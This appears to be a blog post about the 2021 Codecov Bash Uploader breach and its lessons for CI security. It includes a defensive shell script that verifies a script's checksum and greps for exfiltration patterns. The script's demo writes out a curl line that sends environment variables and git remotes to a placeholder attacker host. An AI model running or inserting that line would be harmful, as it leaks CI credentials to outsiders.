What is Codecov?
Codecov is a hosted service that collects test coverage reports from your CI runs and turns them into coverage metrics for your source code. Most projects feed it by running Codecov's Bash Uploader script at the end of their CI job.
Codecov Security Breach:
Last week Codecov disclosed a security breach that began as a Docker container security issue. The attacker gained access because of an error in Codecov's Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script. The modified uploader sent the environment variables of the CI job it ran in (which typically hold credentials, tokens and keys) together with the git remote URL of the repository to a server the attacker controlled. Codecov's investigation shows that the tampering started on January 31, 2021, and it was disclosed on April 15, 2021. Codecov supports thousands of customers, including many private companies and U.S. government agencies.
What it means:
Developer security best practice number one is: don't commit API tokens to GitHub. Inject the tokens into the CI (Continuous Integration) job instead, so they only exist in the build environment. But what if your CI gets breached? That is exactly what happened with Codecov: the tampered Bash Uploader ran inside the CI jobs of many companies, with every injected token sitting in its environment, so the CI processes of those companies were breached.
If you used Codecov's Bash Uploader for test coverage metrics during that window, there is a real possibility that the attacker obtained the secrets exposed to those CI jobs and, with them, made a copy of your codebase or reached other services those credentials unlock. Scary. Developers trusted a third-party company, Codecov, to produce their test metrics, and through that trust an attacker could have compromised their code bases.
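One concrete mitigation for the point above, as an added example that is not code from the original post and not Codecov's own uploader: instead of piping a downloaded helper script straight into bash, download it, compare its SHA-256 with a pinned value taken from the vendor's published checksums, and refuse to execute it if the digest differs or if it contains a line that ships `env` or `git remote` output to a network client. The script names, the pinned hash and the attacker.invalid URL in the demo are placeholders constructed inline; the exfiltration line is shaped like the one Codecov reported in the tampered uploader, with the real destination left out.

```shell
# Added example: verify a downloaded CI helper script before running it,
# instead of `curl -s https://codecov.io/bash | bash`.
# The pinned digest is an assumption for the demo; in a real pipeline it comes
# from the vendor's published checksum file, stored with your CI config.

set -u

sha256_of() {
  # Print the hex SHA-256 of a file using whichever tool is installed.
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

verify_script() {
  # $1 = path to the downloaded script, $2 = expected SHA-256 (hex).
  # Returns 0 only when the digest matches; never executes the script.
  local actual
  actual=$(sha256_of "$1")
  [ "$actual" = "$2" ]
}

looks_like_exfil() {
  # Heuristic second net: flag a script that feeds the process environment
  # or git remote output into curl/wget. Returns 0 (true) if a line matches.
  grep -Eq '(curl|wget)[^|]*\$\((env|printenv|git remote)' "$1"
}

verify_and_run() {
  # Run $1 only if its checksum matches $2 and no exfil pattern is present.
  # Return codes: 0 ran, 1 checksum mismatch, 2 exfiltration pattern found.
  local script="$1" expected="$2"
  if ! verify_script "$script" "$expected"; then
    echo "refusing to run $script: checksum mismatch" >&2
    return 1
  fi
  if looks_like_exfil "$script"; then
    echo "refusing to run $script: environment exfiltration pattern" >&2
    return 2
  fi
  sh "$script"
}

demo() {
  # Constructed demo: a benign uploader, a tampered copy with an exfil line
  # shaped like the Codecov one (destination is a placeholder), and a pinned
  # digest taken from the benign copy.
  local dir pinned
  dir=$(mktemp -d)
  printf 'echo "uploading coverage report"\n' > "$dir/uploader.sh"
  cp "$dir/uploader.sh" "$dir/tampered.sh"
  printf 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload/v2 || true\n' >> "$dir/tampered.sh"
  pinned=$(sha256_of "$dir/uploader.sh")
  verify_and_run "$dir/uploader.sh" "$pinned"; echo "benign rc=$?"
  verify_and_run "$dir/tampered.sh" "$pinned"; echo "tampered, pinned digest rc=$?"
  # Even if someone pins the tampered file's own digest, the heuristic still bites.
  verify_and_run "$dir/tampered.sh" "$(sha256_of "$dir/tampered.sh")"; echo "tampered, own digest rc=$?"
  rm -rf "$dir"
}

demo
```

The checksum comparison is the real control: any byte changed in the script changes the digest, so it would have caught the Codecov modification outright. The grep heuristic is only a weak backstop that a determined attacker can evade, so treat it as a signal, not a gate. Neither check shrinks what the script can see once it runs, so also give the uploader step only the Codecov token it needs rather than the whole job's secrets.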
Future of Codecov, the company?:
- Are they getting sued?
- Are they going to disappear soon?
Future of Codecov users?:
- Are they building an in-house solution?
- Are they removing Codecov?
- Or are they going to stop collecting test metrics altogether?
In many companies, security only becomes important after the company gets hacked. I believe that is mostly because having a security team is expensive. What happens when your app's source code gets compromised?
Maybe it's time for a new test coverage metrics solution from Google.
Because of the breach, many companies had to rotate every token used in their CI processes; Codecov's own advice was to re-roll all credentials, keys and tokens that were present in the CI environments that ran the Bash Uploader. Lesson learned: don't blindly trust third-party tools that run inside your CI, free or not. Last week my task was to update the tokens in an Android Bitrise continuous integration configuration. Hopefully Google releases a solution for test coverage metrics; I wonder how Google measures its own testing metrics.
Thanks for reading. Let me know if you have any questions.
References:
- Bash Uploader Security Update (Codecov): "Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to…"
- Codecov hackers breached hundreds of restricted customer sites: sources (Reuters, San Francisco): "Hackers who tampered with a software development tool from a company called Codecov used that…"